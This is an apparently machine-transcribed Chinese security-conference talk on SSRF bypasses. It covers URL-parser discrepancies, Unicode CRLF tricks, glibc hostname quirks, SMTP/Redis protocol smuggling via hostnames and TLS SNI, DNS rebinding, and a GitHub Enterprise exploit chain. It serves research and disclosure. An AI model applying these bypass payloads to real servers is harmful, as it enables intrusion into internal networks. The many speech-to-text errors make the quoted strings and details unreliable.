喂，好，安安，那感谢大家选择我的场次，不对，这个时间也只有我这一场。那感谢各位这么早起好了。那这场演讲比较偏向 Web Security 上面的一些新技术以及手法。那 SSRF 是一种在网页安全上面的一个攻击手法。SSRF 这个概念第一次被提出来，差不多是在2008年，也就是差不多十年前。那在这十年间，发展出了许多攻击手法以及防御手法。那它曾经不被受重视，但是又因为叉叉一的这个攻击手法出现而开始繁荣起来。那有人说，新的网页安全它的关键点是 SSRF 模板注入以及一些反序列化注入。那在网页架构越来越复杂的今天，各种架构堆叠起来的今天，那耳熟能详的 SQL injection、local file inclusion 基本上已经视为很难会再出现。但是你还是可以发现 SSRF 这个漏洞一次又一次在一些大型网络公司，例如 Facebook 或是 Google 上面出现。所以对于一个关注 Web Security 的人来说，熟悉 SSRF 的各种新的利用技术，那绝对是必要的事情。好耶、yeah ！每次到中国比赛都会被吃豆腐，那这次终于轮到主场了。那前几天问过主办单位，这次好像来自中国的朋友特别少，那所以台下有的话就稍微忍耐一下这样子。那台湾 Number One， 那后面那句就不讲了啦，就给予尊重，这也是台湾。好，那我去年刚从硕士毕业，那目前在 DevCore 服务研发替代役。那我相信应该大家都知道 DevCore 应该是台湾最专业的做渗透测试的公司。所以说如果你们有人想对网站进行渗透测试，或者是需要 Red Team 对整间公司进行渗透，找出企业的弱点，那欢迎来找我们。好，这里是我的一些介绍。啊，我的兴趣其实还蛮多元的啦。从2014、2015年开始，因缘际会开始接触 CTF， 那之后就开始成为电竞选手，在世界各地到处飞来飞去比赛。那2016年开始转为奖金猎人，那也小有一番成绩。到了去年年底，想说今年想要在国际上发光发热，所以开始投了一些国外的 conference， 然后出国演讲这样子。好。昨天有个讲者跟我说，投影片有猫就赢一半。哎，有人笑，那看来他讲的是对的。好，那这是我今天的一个 agenda。我们这份投影片的目的是要让 SSRF 重返荣耀。我们会先从一些有趣的案例，向大家介绍一下我今天这份投影片的一些核心概念。首先，我会介绍一个新的方向，去绕过既有 SSRF 上面的保护。接下来会介绍新的技术，去达到所谓的一个 protocol smuggling。那我等一下会介绍什么是 protocol smuggling。好，所以说将这个新方向与新技术结合在一起，那我们可以去绕过既有的 SSRF 保护。那在基于这个保护，基于绕过这个保护之上，再利用新的技术去增强原有 SSRF 的威力。所以这样的一个攻击链，一个组合链，其实可以达到很多很深的攻击力道，甚至去 compromise 一台伺服器。所以最后讲了这么多技术，当然不是空口说说，那我们最后会有真实世界的一些案例以及 demo 给大家看。好，什么是 SSRF？ 那举个例子好了，像现在很多的网站为了一些使用者体验，会提供一些方便的功能。例如说，如果你在 Facebook 上面，你在贴了一个网址之后，那这个网址 Facebook 会对它进行预览。那预览这个功能是由 Client 去做到，还是由 Server 去做到的？那假如说是 Server 去做到，那假如说是 Server 做到，好，那又或者是 Google 在上传图片的时候，会提供你一个选项，是从网址上传。那你提供如果你提供一张正常的图片网址，那 Google 当然会去抓。那假如说你提供的网址是一张在内网的网址呢？那是不是 Google 它就会无视于防火墙的保护，去把这张内网的网址给抓下来？那 SSRF 的精髓就在这里。所以用一句话去讲述 SSRF， 其实就是它可以绕过你的防火墙，并且碰触到你的内网资源。所以 SSRF 这个东西，它的攻击面会随着你拥有的内网资源越大，
你的企业内网越大，则 SSRF 的攻击力也就越强。所以有人戏称啦，戏称 SSRF 是一个专打有钱人的漏洞。因为有钱人他的内网就大，那他内网大的话，你 SSRF 可以碰触到的资源就多，那所拥有的攻击面也就越多。好，所以我们有了 SSRF 可以去碰触到可能受害者或是对方的内网资源。那至于说要怎么去更加进一步的利用 SSRF， 那这是一件非常考验骇客功力的一件事情。怎么说呢？其实 SSRF 的利用很吃攻击者的基本功，对于网络架构对于网络架构的越了解，或是对于网络底层越熟悉，那他才能够越能好好的利用 SSRF。SSRF 的利用手法以及场景太多太多了，而不同的手法或是面对不同的场景，又存在他们的自己的一些限制。举个例子，如果在内网中存在着这些服务，例如说 Elasticsearch 或是CouchDB 或是 MongoDB、 Docker 又或者是 FTP、 SNTP、 Redis 或是 Maincache， 在内网中就算这些服务在内网，但是我们依然可以透过 SSRF 去绕过防火墙，去碰触到这些服务去进行攻击。好，那在我们开始今天的主题之前，我来先做个小调查，这里有多少人有在用 Python？ 有的帮我举个手好吗？哎，还蛮多的耶，可是这边不是 PyCon。 好，没关系，我想问你们一个问题，假如说你们要用 Python 去抓网页，就是抓爬虫，就是把它写爬虫或是抓网页，那你们会用哪些 library？ 那我想啦，大部分人会用的 Python 去抓网页的 library 可能是request s url lib 或是 url lib2 这些常见的内建的http library。 好，那我们先从一个简单有趣的案例开始。那想一下这个网址，看一下这个网址，红色的框框是一个空白，它是一个空白。如果我今天跟你说你要用 Python 去抓这个，去存取，原来有 IRC 啊，那有问题的话可以在 IRC 上面讲一下这样子。好，那如果我跟你说今天你要用 Python 去抓这个网址的内容的话，那哪个地址才是真实会被访问到的？是 1.1.1.1 吗？还是 2.2.2.2？ 还是 3.3.3.3？ 那我这边给你五秒钟的时间想一下。好，答案揭晓喽！答案揭晓喽！好，这个就是答案。对，真是黑人问号。好了，讲正事，就算是 Python 内建的 library 中，对于同一个 URL， 它的解释其实也是非常不一样的。那 request 可能就是访问到绿色的部分，那 url lib 就可能访问到蓝色的部分，那剩下的 url lib2 可能就访问到橘色的部分。那明明在这三种像是 http lib、 url lib2 跟 url lib 这三个都是 Python 内建的 http library， 可是他们对于同一个 url 的解析都不一样。那这种不一样，这种不一致，就可能导致一些 security 上面的一些 problem。 Python 真的很棒， Python 真的很严格，我都不知道该说什么了。好，那另外一个案例是 smuggling 去做 SNTP protocol 的伪造在 HTTP 的协议之中。好，那 protocol smuggling 意指在协议中，原有的协议中去走私其他协议，其他非法的协议。例如说，在这边的例子是在HTTP 的 protocol 里面去走私，去 smuggling SNTP 的 protocol。那又因为 SNTP 的 protocol 其实是一个 line by line 的一个 protocol， 就是一行一行的这种形式，所以我们利用 CRLF injection的方式去把我们要的 payload 插在 HTTP 之中，插在 HTTP 之中。好，所以利用 SSRF 可以绕过防火墙的特性，对内网的 SNTP 的伺服器去发动攻击。但是这边会出现一个问题，是说
现在的一些 SNTP server 它都会有一些安全性上面的考量，所以现今的 SNTP server 会去阻止 HTTP connection。 如果 SNTP server 看到这个 connection 的第一行有 HTTP 的 pattern， 例如说 get 斜线或是 post 斜线的话，它会直接把整个 connection 给 close 掉，所以导致我们的攻击失败。好，所以 SNTP 似乎不太喜欢 HTTP protocol， 所以在这个环境下似乎是没有办法去做 exploit 的。好，但是一定会有人跟你说你可以用 Gopher。 如果有在玩 SSIF 的话一定会知道 Gopher 是一个非常棒的一个 万金油的 protocol。 那 Gopher 真的很棒，但是我们今天不打算讨论 Gopher。 Gopher 很棒，现实中有很多 Gopher， 但是现实中有很不是有这么多 Gopher 存在的场景。怎么说呢？不是所有的程式语言的 library 都支援 Gopher 这个 protocol， 虽然说它很好用。而且如果你是程式设计师，你要写一个阻挡这个网址只能使用 HTTP 或 HTTPS 的程式的话，那其实还蛮简单的。所以说去阻挡一个 protocol 是 Gopher 其实是一件非常简单的事情。但是你要想哦，在一个 SSRF 中 HTTP 跟 HTTPS 是一定会存在的。所以说我们这份投影片专注在HTTP 以及 HTTPS 下面的 SSRF 攻击面。好，所以不要讲 Gopher 了，我们来把 SNTP 的 protocol 藏在 HTTPS 里面。但是一定会有人有疑问 ，HTTPS 是一个加密的 protocol。好，所以所有的讯息、所有的 message 在 SSL 里面都会被加密。不然你怎么敢用？所以要如何做到在 HTTPS 里面去伪造 SNTP 协议呢 ？OK， 让我们想一个问题：有什么东西在整个 SSL 里面是不会被加密的？有什么东西是不会被加密在 HTTPS 或是在 SSL 里面？好，那答案是利用 SNI Server Name Indication。好，我们可以向攻击目标的25 port， 就是 SNTP protocol 的 port， 去送一个 HTTPS 的连线，以达到去绕过检查，绕过它检查 HTTP connection 的一个协议。那把攻击 payload 放在 SSL 的 SNI 里面，我之前好像看到没有看过有人这样子搞过，所以应该是一个蛮好玩的新东西这样。好，那在 SSL 的连线的初始化中，那我们的 client 也就是我们会送一个 hello message 给伺服器。那这个 hello message 里面包含了一些 metadata， 那包含了自己所支援的一些加密协议以及一些杂七杂八的资料在里面。而在这个封包中，在这个 hello message 中会有一个 SMI 的 extension。那 client 就是我们会将当初连线时远端的 hostname 放进这个 extension 中。好，所以如果我们可以在 hostname 插一些奇怪的字源，那是不是 hello message 里面的这个 SMI extension 也会掺杂着一些奇怪的字源，可以让我们去做更进一步的利用？那在这个 case 中，就是那个黄色框框，它是一个空白。那这空白其实非常的重要，它让我们可以塞一些奇怪的东西在我们的 domain name 中。好，所以你可以看到有那个空白之后，我们可以在后面接了很多一堆杂七杂八的 data 或是一些怪东西在整个 domain name 中，而且还可以去做正常的连接。而这些杂七杂八的域名还是会被作业系统解析成 127.0.1.1， 然后并且去 连接到本机的localhost 的25 port， 也就是 SNTP 的 service。 好，那为什么这个东西 works？ 为什么这个东西可以成功？那这里用到了一个 trick， 在 Linux 的 glibc 中。好，那你们先帮我记得，晚点会介绍到。
在 CILF 换行的中间，也就是我们所谓造的 SNTP protocol， 就是 HELO Orange.TW 那些东西。那你可以看到，其他所有的内容都是加密的，但是我们伪造的资料却是正常的 SNTP 的协议。那我们用到的指令就是很简单，就是要 server 用它内部的域名，或是用它自己的域名帮我们寄一封信出去。好，那假如说你这个 hex dump 看不懂的话，那我们来看一下 plain text。刚刚是用16进位的方式来看封包。那我们现在用 lie by lie 的方式来看封包，那人类会比较好理解。你可以看到，在整个 client hello 中，再也没有那些 get 斜线或是 post 斜线的特征。然而 server 伺服器还是会把中间的明文资料当成合法的 SNTP 指令。所以我们成功 exploit 一个本来不能 exploit 的情境了。好，我们用了两个有趣的例子来作为今天正文的开场以及引言。那接下来我们就开始我们的正式议程。好，第一个章节，让 SSIF 重返荣耀。今天我们准备了四个部分来让 SSIF 去重返荣耀。好，第一个是 URL passing 的问题。那这边的问题全发生在当 URL 的 parser 跟 URL 的 requester 对同一个网址解析不一致会导致的一些问题。处理一个网址是一件非常困难的事情。那在软体工程中，很多对于 SSIF 的修复是或是 work around， 就是去过滤去 validating 一个网址是否合法。但是我刚才有说，就是去检查一个网址，去处理一个网址是非常困难的事情。怎么说呢？一个网址的详细规格定义被定义在 RFC 3968中，但是这个 RFC 只有定义规格，只有定义 spec， 但是根本没有说要怎么去做实作。那只有定义 spec， 但没有说怎么做实作，那这中间可能就会产生很多问题。好，例如说，这是一个我从词典上面抓下来，人鱼这个东西它的规格是传说中半人半鱼的生物，其容貌美丽。那大家的想象可能会是这个样子，但实际上可能会变这个样子。所以 spec 是半人半鱼，但是没有说哪一半是人，哪一半是鱼。所以实际上因为没有详细规定要怎么实作，那实作出来的成品可能会出乎你的意料之外。例如说，老师上课教的跟考试考的一定不一样吗？就是 spec 定义，但是实际上做的就是跟 spec 不一样。好，画 WG 是一个由 Mozilla 或跟 Apple 还有 Opera 所发起，以推动网络标准为目的的一个组织。那他们想要定义一个基于 RFC 的标准实作，让大家可以有个 guideline 去遵守。但实际上这个标准只有 browser 在遵守，只有 browser 在 follow。大部分的程式语言依然按照他们自己的喜好去实作 URL parser 这个东西。那也正因为是自己去做实作，所以在他们的实作上面充满了许多 bug。RFC 怎么去定义一个网址？那这是 RFC 所定义的一些，右边 RFC 所定义的一些部分，有 skin、authority、pass、query 跟 fragment。好，那这是我们今天会探讨到的部分。在 skin 上面，我们只探讨在 HTTP 跟 HTTPS 下面的攻击面。那 authority 跟 pass 这两个东西其实非常复杂，我们等一下会介绍到。最后是 query 跟 fragment， 就是我今天就不管它，因为这边其实还好。好，那这是我们今天所会 cover 的一些漏洞的一些列表。那我这边挑了各个程式语言中的一些内建的 HTTP library 去做测试。那我们将 URL passing 的问题分成三个： POST injection、HOST injection 跟 pass injection。 那关于 protocol smuggling 上面的问题同样也分成三种，一种是在 pass 上面的 protocol smuggling， host 上面的 smuggling 跟 SMI 上面的 smuggling。 好，那我们来看一下这段简单的 PHP code， 只有七行而已。这也简单的从 get 参数要了一个 URL 的参数，那接着直接使用 read file 去访问它。但是为了去防止 SSIF 这个攻击，所以程式设计师用了 PHP 内建的 pass URL 去检查 host 跟 poll 是否合法。
那如果他在白名单，就是要检查他合法是否在白名单内。那如果所以说，如果你给他127.0.1.1 POL81 那你就会被挡掉。可是你想一下，如果是这个网址呢？大家都知道，在一个网址中，分号是用来分隔 host 跟 pod。那你有想过，这个分号要从网址的前面来解释，还是从网址的后面来解释吗？那 IFC 只定义分号这个 spec， 但是根本没有说要去怎么去实作它。那所以说，这就产生了很大的问题。有些 parser 从前面来做 pass， 有些 parser 从后面来做 pass。所以你觉得这个分号要从前面还是后面呢？好，这个其实是一个很有趣的问题。PHP 的函数 pass URL 认为要从后面解释，所以它的 pole number 是80。但实际上 PHP 的 read file 却是存取到 pole number 1211。那这两个函数都是 PHP 内建的函数，但是它们的行为却超级不同。所以我们可以利用这些不一致去达到 SSRF 上面的绕过。好，还跟得上吗？那如果跟得上的话，来看一下这个网址 google.com@avo.com。好，那这又是另外一个故事了。Pass URL 会把 google.com 当成是合法的 host name， 但是 read file 依然会存取到 avo.com。所以，如果是用刚刚的白名单去做检查的话，那这个网址可以完美的绕过刚刚所有的检查。好，那跟刚刚的 pole number 一样，我猜你应该会好奇，到底哪一个行为才是正确的？是 google.com 还是 avo.com？ 好啊，那我觉得那个玉米已经告诉你说哪一个正确了啦 ，avo 就是不正确的那个这样子。好，那这个问题出现在这个 pattern 这个问题，其实出现在很多的程式语言中，例如说 PHP、Java、Curl 以及 Python 都出现过。那根据 IFC 的定义。Authority 这个 part 要从两个斜线之后开始取，然后到下一个斜线问号或是井号而停止。所以根据 IFC 的定义，正确的 hostname 的实作应该要是 google.com 才对。好，那我们再看下一个例子。如果你不喜欢 PHP， 我们来看一下 curl 有没有这个问题。那 curl 是一个非常有名的 library， 而且它有很多的 language binding。那想一下这个网址，想一下 curl 怎么去解析它的 foo@avo.com:80@google.com。好，大部分的 URL parser 会认为 google.com 是合法的，但是 curl 排除众议，坚持 avo.com 才是合法的。所以这个 curl 以及其他 URL parser 上面的差异，会导致一些 security 上面的一些问题。我相信你我都同意 curl 非常多人用，而这个小问题就会跟着被放大。所以如果有一个 web application 使用了自己的 URL 函数库去检查网址，但是使用 curl 去抓取资源，那可能就非常有问题了。那其实这个场景在 PHP 中非常的常见。因为 PHP 内建的 HTTP 的 library 很烂，所以大家会选择用其他的 library， 例如说 curl。好，那我发现这个问题之后，马上就向 curl 的 security team 回报。那他们的回复也很迅速，马上给了一个 patch。但 patch 出来后，就当然要检查一下 patch 有没有问题。那马上又发现可以用一个空白去绕过他们的 patch。虽然这有点白痴，但是其实不能全算是 curl 团队的问题。那这里一样用到了一个 Linux glibc 上面的特性，那我们等一下会多做解释。但是我觉得 curl 在验证网址这方面可以再更严格一点，所以说我又重新回报一次，但这一次他们回复就 curl 没有办法100%的保证说一个网址的语法没有问题，所以说程式设计师在传网址进去的时候自己要先检查。好，所以说他说这不是一个大问题，他们会写在文件去提醒大家。真是黑人问号。所以 curl 认为这是开发者的问题，那这个问题似乎永远不会被修复，但至少前一个 patch 依然 work 在 curl 的 7.54 上面。好，第二个部分是用 Unicode 去攻击 Node.js， 来看一下这段 Unicode 的那个 Node.js 的程式嘛。这里有一个使用者可控的参数，
那你可以把它当成是一个使用者名称之类的。程式会嘛，程式会把 sandbox 下面使用者同名的目录当成加目录。所以为了要防止 directory traversal， 那程式码使用检查的使用者名称不能有点点两个字，所以说你无法存取在 sandbox 以外的档案。好，那今天我们的问题是，假如说今天有一个密码档在根目录下面，那但是你可以存取的范围都在 sandbox 目录下面，那你要怎么去绕过这个限制去抓到那个密码档？好，这个答案是用 Unicode 中的全形英文字母 N。 那这个可能国外的人就比较没有办法发现这个问题，因为他们没有用全形的字。对，好像这个网址真的可以抓到在根目录下面的密码档。那我们来解释一下为什么。在 JavaScript 的实作内部的实作中，使用了 UCS2 的一个编码当作处理字串，所以 Unicode 的全形字母 N 会被表示成16进位，也就是16进位的 FF 跟 FF 跟21。好，那奇特的是，在 Node.js 内部的一个 buffer string， 它在编码转型的时候会把第一个 byte 舍弃掉。那 JavaScript 使用 UCS2 编码，而 Node.js 实作是用 C++， 它是用 byte 处理的方式，所以这个 FF 就会被拿掉。那剩下的东西其实就是16进位的21，也就是 ASCII2 的 dot。那网页伺服器又把点点斜当成 parent directory， 就是父目录，所以说我们可以下载原本在 sandbox 外的任意档案。好，所以在 Node.js 的 HTTP module 中，两个全形英文字母 N 就是新的点点斜。这次就真的是黑人问号。好，这个特性同样可以被用在 protocol smuggling 上面。原本哦 ，HTTP 的 module 会防止 CRLF injection， 所以说如果你插的换行在整个网址中 ，HTTP 的 module 会用 URL encode。编码把路径上的换行给过滤掉，但是我们可以用刚刚讲的这个 Unicode 的一个特性，漏洞也不能说是漏洞，就是一个特性去绕过这个保护。我们可以使用 Unicode 的 FF0D 跟 FF0A 去绕过这个保护。那所以说 HTTP module 在网址中找不到换行，所以就没有办法用 URL encode 去做过滤。但 buffer string 在 output 的时候，那依然会把 FF 拿掉，所以我们的换行的字源又出现了。所以说我们重现了在 Node.js HTTP module 中的 protocol smuggling。好，那第三个则是 Linux glib c 上面的一个奇异特性。那这里我们介绍在 NSS function。get host by name 上面的一个奇怪小特性，在 fuzzing， 当我在 fuzzing URL 的时候，我发现一些怪异的行为，百思不得其解，所以我开始追 glibc 的原始码。那追到一个关键地方的时候，发现它上面有一段 source code， 有一段注解 ，convert an ASCII string into an encoded domain name as per IFC 1035。他是说这个 function 会根据 IFC 1035去做一些转换。那什么是 IFC 1035呢？IFC 1035定义了一些关于域名以及 DNS 协议的一些细节，但令人惊讶的是 IFC 有说到 DNS 的 protocol 其实支援十进位的转换。所以你可以看一下这个 C program OR 反斜线 097NG1.TW， 它的结果其实会跟 Orange.TW 的结果是一样的。那在看到这个特性的当下，其实我有简单的找一下 Linux 的 main page，但是根本没有发现手册上有提到这件事情。那这个特性其实在绕过一些黑名单保护的状况下，应该还蛮有用的。另外值得一提的是，它的那个 source code 对于反斜线后面如果不是接的不是数字的话，那它会有特别的处理，它直接把反斜线给拿掉。所以这边就出现另外一个有趣的方法，可以用一堆反斜线去混淆你的 host name。那你可以看到我这边用 Python 来做范例，那我这里用 print host 这个东西来证明这个反斜线的取代并不是由 Python 来完成，而是由 get host by name 来完成的。这个特性你可以马上在你的 Linux 上面试试看，那记得哦，只有 Linux 有效。好，你看加了一堆反斜线还是一样，那换成一堆十进位还是一样，你可以直接去 ping 这样的 domain，
然后还是会返回正确的结果。好，那下一个则是 Linux getAddressInfo 上面的一个奇怪特性。Linux 的 getAddressInfo 会把一个合法 IP 的地址加上空白后面的垃圾资源给 strip 掉，所以这个 C program 还是会回传一个 127.0.1.1， 虽然说我给它的 hostname 是 127.0.1.1 空白 FOO。 好，所以它依然会回传 127.0.1.1。 这个特性看起来很没有用，但是你要知道的是 getAddressInfo 是一个非常在 Linux 中是一个非常基本基础的一个函数，所以根据这个函数被使用的多寡，这个特性的攻击威力可以被放大。举个例子，在 Python 的 Socket 的 module 中，它的 getHostByName 这个函数内部实作是用 Linux getAddressInfo， 所以说在域名中的这个 CRLFOO 会直接被移除掉。所以这可以解出一个合法的 IP， 代表域名没有问题。那这让我们有机会去污染整个域名，去做一些更进阶的攻击。好，那我们来看一下怎么利用刚刚的特性去做更进阶的攻击。首先我们来攻击 URL parsers。 URL parsers 会认为整个 127.0.1 tab 然后foo.google.com 是一个合法的 hostname， 合法的一个 hostname，但 HTTP 的 library 会存取 127.0.1.1。 好，那第三个这个 double encoding %2509 比较特别一点，需要多一点解释。为什么 double encoding 还是可以 works？ 在追一些 library 的时候，其实发现像 Perl 它收到网址之后会去做两次的 URL decode， 所以还蛮奇怪的。那这个特征在绕过一些子域名检查还蛮有用的。例如说你的网站检查你的网址必须要是.google.com 才可以去做下一步动作，那这个网址绕过了这个检查，但实际上访问的会是它的 localhost， 所以可以绕过原本检查子域名的一个检查。好，那接着是用 glibcNSS 的特性去做到更进一阶的一些 protocol smuggling。 首先为什么可以攻击，在 HTTP Protocol 1.1 的协议中，它要求一个 host 的 header， 而大部分 HTTP library 的实作会直接将网址的 hostname 直接放到整个 HTTP 的 request 中。所以配合前面的特性，你应该可以马上想到，现在我们可以塞奇怪的东西在 hostname 中，那整个 library 又会把 hostname 放到 HTTP request 中的 host 这个 header。所以说我们可以在 HTTP 中完成 protocol smuggling， 未造成其他协议。例如说你看到这个网址，整个 127.0.1.1 换行 slash of orange.tw6379 都是我的 hostname， 但是 HTTP library 依然认为它是合法的网址，并且连上本机的6379 port， 然后并且把 request 送出去。而这个换行刚好分隔了我的 Redis 的一个指令，所以我成功的在 HTTP 的 protocol 中去掺杂着 Redis 的 protocol。 好，那 SNI 的 injection 也是同样的想法，在 SSL 的 handshake 中， SNI 这个 extension 会包含远端的 hostname 在这个 hello message 中。所以说如果我们插了一些换行在 hostname 中，那我们的 SNI extension 或是 hello message 中就会有我们的明文的 payload在整个加密的讯息中出现。好，这里我给出一个实际的例子，这是一个关于绕过 Python CVE 2016-5699的一个例子。那这个 CVE 是一个 HTTP Live， 就是它是一个 CRL 在 HTTP Live to header 上面的一个 CRL of injection。这个 CVE 同样影响着 URL lib2 跟 URL lib， 因为这两个 library 用了 HTTP lib 去建构他们的 HTTP request。而在这个漏洞的修补中， Python 用了一组 regular expression 去检查 header 中没有换行出现，不然它就会喷一个错误给你。但你可以看一下这个 regular expression， 它给了一个例外，这个例外是允许一行的开头是由空白跟 tab 开始，所以我们可以用一个前缀的空白去绕过这个 patch。 那由这个 POC 你可以看到在换行的后面多了一个空白，那所以这样子的东西不会喷错误，
所以说原本被修补的漏洞又可以在最新版本的 Python 上面重现了。但这样会多一个空白，很不方便。可恶。不过感谢 Redis 跟 Main Cache， Redis 跟 Main Cache 的实作中会直接移除整行前面的空白。所以你看，就算我的指令前面多了一个空白或是 tab， Redis 依然认为它是一个合法的指令。所以说我们绕过原本的 patch， 整个攻击代码又重新可以去做利用的。好，最后一部分是攻击 IDNA 的一个标准。IDNA 定义了一个 Unicode 如何在 DNS 上面去做实作，而目前在用的 IDNA 标准其实有两个，2003跟2008。虽然说2008比较新，但相对也比较严格，所以原本在2003上面使用 的 Unicode 到2008会烂掉。所以大部分的浏览器为了一些相容性的因素，它用了一个过渡期的标准，就是用 IDNA 2003加上一个 UTS-46 的一个转换。那在 IDNA 中支援了一堆奇怪的 Unicode 转换，例如说用圆圈圈包起来的英文字母，它在 Browser 上面依然会是合法的。那或者是 Unicode 200D 这个字元，它是一个用来做一个不列印的一个字元，在某些复杂的排版上面，那如果它，所以说它在 Domain 中会被 IDNA 2003去视为会被 IDNA 2003跟 UTS-46 上面的转换整个被移除掉。所以说如果 URL 的 parser 跟 URL 的 requester 支援不同的 IDNA 标准，那它就有可能会产生问题。好，一个有趣的小例子是拉丁字母的 small sharp s， 这是一个 JavaScript 的一个小案例，那你可以自己打开浏览器去做尝试。这是一个德文的字母，那有趣的是这个德文的字母没有相对应的大写字母，所以说如果你把它转成大写的话，因为它没有一个相对应的大写字母，那它会被转成两个 s， 两个大写 s。 但是如果你判断两个大写 s 或是两个小写 s 是不是等于这个德文字母，那 它依然是不相等的。可是如果你用浏览器去访问这个奇特字母的这个网址，那它依然会去访问 wordpress.com。 这个小特性可以去打破一些黑名单的防御，那我们等一下会给一个实际上面的一个例子。好，案例分享，这是我投影片中最后的一张猫。前面讲了这么多，那我们来把这些技术用在真实世界上面。那 WordPress 是一款非常有名的网页程式，那据它官网的描述中啊，官网的描述说整个世界的网站有 27% 是用 WordPress 来架设的，而 WordPress 花了非常多的心力在 SSRF 的保护上面，但是我们依然发现了三种不同的方式去绕过这些保护。但可惜的是 WordPress 到现在还没修啦，所以为了负责任的一些漏洞通报原则，所以我这里用 MyBB， 也是一款非常知名的一个 Open Source 的一个系统来作为我的案例分享。那不过啦，我介绍的手法都是非常通用的，所以如果你听完之后应该也知道要怎么用在 WordPress 上面。这张表格列出 WordPress、 VBullet 跟 MyBB 中对于存取一个网址的时候会用到的一些核心元素。那 SSI 我的那个绕过 SSIF 的核心概念就是找出这三者中的不一致。只要你可以找出任两者中的不一致，你就可以去达到一个 SSIF 的绕过。好，那这是 MyBB 对于 SSIF 的防御。那这个今天要介绍的第一招其实不是一个新的手法，它是一个 TOC-TTOU Time of Check to Time of Use 的一个问题。 MyBB 用 Pass URL 去检查网址中的 Skin Pole Number 是否合法在 白名单内，那接着使用 Get Host By Name 去把 Domain 所相对应的 IP 取出来，确保这个 IP 不在黑名单里面。所以说如果传进去的网址通过上面所有的检查，那 MyBB 最后会使用 curl 去存取这个网址，并把内容抓回来。好，整个 TOC-TTOU 的问题在于，这个 domain 在检查时的状态跟在使用时的状态是可以不一样的。好，所以我们可以设置一个 DNS 的 server， 让第一个使用 get host by name 的 DNS query 指向一个不在黑名单的 IP 地址，例如说 1.2.3.4。 当我们通过检查之后，MyBB 会去存取那个网址嘛？那这个存取的动作又会产生一次 DNS 的 query。那这时候，在这个 moment， 我们把这个 DNS 的 record 指向 127.0.1.1。
好，所以在检查的时候 DNS 拿到的结果是 1.2.3.4， 但是在存取的时候拿到的结果是 127.0.1.1， 那这就是 TOC TTOU 这个问题的精髓所在。好，第二个绕过方法是对于 IDMA 标准的一个资源差异。 Curl 是一个非常聪明的 library， 它可以原生资源 Unicode 域名的自动转换，但是 PHP 的 get host by name 不能，所以这边一个可以一个不能，这一点差异就导致了 SSRF 的绕过。所以你可以看到对于这个 URL smallsharps.orange.tw get host by name 在抓 IP 的时候会回传 forced， 但是它所以说它可以通过检查，但是 curl 依然会抓到 127.0.1.1， 并且访问到受害者的内网。最后一个则是利用 URL parser 以及 URL request 的不一致达到的绕过问题。我们前面 提到了 N 多个关于 URL parsing 的问题，那利用那些问题我们可以绕过所有的 SSRF 的一个保护限制。就像是前面所讲到的一个井号 bug， pass URL 会认为 google.com 是一个合法的 host name， 但是 curl 会存取到 127.0.1.1。所以当你在遇到 SSRF 的时候，这是一个非常方便的一个测试 pattern。 那比较可惜的是这个 pattern 在 PHP 7.0.13 的时候就被修复了。所以如果你不喜欢 PHP 的话，那你一样可以用我们前面所提到 curl 的漏洞，那最后的结果也会是一样的。那虽然说这个漏洞依然就是我回报之后在 curl 的 7.54 被修复，但其实大部分的 patch 都没有跟上。例如说在最新的 Ubuntu 17.04 上面，libcurl 的版本依然是 7.52.1， 依然是没有修复的版本，所以这个漏洞其实还可以 work 在大部分的系统上面。那又或者是你可以用到我们前面讲到的空白小技巧，而这个问题 curl 永远不会修复。好，那我们来看最后的一个案例，世界上最大的男性交友平台 GitHub。 GitHub Enterprise 是一款可以跑在本地的一个 GitHub 版本，所以你可以把整个 GitHub 架在自己的内网。好，那 GitHub Enterprise 它的程式码 80% 是用 Ruby on Rails 所撰写，而且程式码是有经过混淆的。不过值得一提的是 GitHub Enterprise 的 source code 的原始码跟 GitHub 是一样的，跟 GitHub.com 是一样的。在程式中，在整个程式码中有一个环境变数，可以自由切换你当前的模式是 Enterprise 模式还是 .com 模式。所以说如果你要去研究 GitHub 的 Security， 我还蛮推荐你去读一下 GitHub Enterprise 的程式码的。在这个例子中，我将会介绍一个超优美的 Exploration。 这个 Exploration 会把四个原本看起来毫无危害的一个漏洞串在一起，变成一个非常严重的 Remote Code Execution。那这个漏洞在 GitHub 第三届的 Bug Bounty 比赛中拿到了最佳漏洞的奖项。在 review 整个 GitHub 的功能的时候，我看到有一个有趣的功能叫做 Webhook。 Webhook 是一个你可以在自己的专案上面去定义一个 callback。 那所以说当有人对你的专案去做任何变动的话， GitHub 就会透过你指定的这个 callback 去做通知你的这个动作。在这个 webhook 中， GitHub 用了一个 RubyGen Faraday 去做所谓 callback 这个 HTTP 的讯息传送，而为了防止 SSRF， GitHub 用了另外一个 RubyGen Faraday Restrict IP Addresses 去保护整个 webhook。 那这个 RubyGen 没有什么人用，看起来是GitHub 开发者自己去开发了一个小菌，那看起来只是一个简单的黑名单保护，那可以用一个零轻松的绕过。在 Linux 中，零就代表 localhost， 所以我们有一个 SSRF， 所以我们有一个 SSRF， 但其实我们什么都不能做。为什么？在这个 SSRF 中有非常多的限制，例如这个 SSRF 只允许 HTTP 跟 HTTPS 的 skin， 甚至它没有302的跳转可以让我们去转换成其他的 skin。而这个 SSRF 是一个基于 POST 的 SSRF， 我们也无法去控制 POST 的内容以及其他的 header 等等。而最重要的是，我刚才前面介绍了这么多 CRLF 的 injection， 在这边都无法使用，所以我没有办法去做到 protocol smuggling 的这个动作。我们有一个 SSRF， 但又不能做什么事情，那真的是蛮郁闷的。
所以我的下一个想法是，在内网中有任何的一些 HTTP 的服务，我们可以去做利用的吗？那这是一个蛮大的工程啦。在 GitHub Enterprise 中有超多的 HTTP 服务，那每一个服务又有可能是不同的程式语言所撰写，例如说 C++ 或是 Go 或是 Python。像大家知道有个服务叫 pages.github.com， 它的后面的实作其实是用 Lua 来实作的。Lua 我觉得超有趣的。那经过几天的研究之后，发现在 localhost 的 POL 8000上面跑了一个 Graphite 的服务。那 Graphite 是一个即时拥有 高扩展性的一个图表系统。那我们同样在这个上面发现了另外一个 SSRF 的一个弱点。那第二个 SSRF 弱点其实还蛮简单的， Graphite 直接去抓使用者传入的 GET 参数，然后并且访问，那就产生一个 SSRF。 好，我们现在有两个 SSRF， 我们可以把这两个 SSRF 串在一起，变成一个 SSRF execution chain， 可以打脸回去了。另外一件事是，我们成功的将一个 post best 的 SSRF 转换成 get best 的 SSRF。 好，那所以说现在第三个漏洞，在第三个漏洞是关于 CRLF injection。 在前面的 SSRF 第二个 SSRF 中，你应该有注意到说第二个 SSRF 的实作是用 Python 的 HTTP lib。在我前面的投影片中讲到说 Python 的 HTTP lib 中存在了非常多的 CRLF injection， 